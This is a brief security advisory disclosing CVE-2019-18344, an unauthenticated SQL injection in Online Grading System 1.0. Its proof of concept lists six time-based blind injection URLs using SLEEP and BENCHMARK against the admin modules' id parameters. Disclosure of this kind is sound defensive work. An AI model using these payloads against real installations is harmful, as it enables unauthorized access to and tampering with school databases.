Online Grading System 1.0 SQLi

    Disclosure date: 10/23/19

    CVE-2019-18344

    Online Grading System is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the student, instructor, department, room, class, and user, parameters.

    Proof of Concept:

    http://192.168.86.24/admin/modules/student/index.php?view=edit&id=20004277 AND 1789=BENCHMARK(5000000,MD5(0x4564524a))
    http://192.168.86.24/admin/modules/instructor/index.php?view=edit&id=1 and SLEEP(5)
    http://192.168.86.24/admin/modules/department/index.php?view=edit&id=1 and SLEEP(5)
    http://192.168.86.24/admin/modules/room/index.php?view=edit&id=0 and SLEEP(5)
    http://192.168.86.24/admin/modules/class/index.php?view=time&classId=3 and SLEEP(5)
    http://192.168.86.24/admin/modules/user/index.php?view=edit&id=1 and SLEEP(5)


    © 2020 sevenlayers.com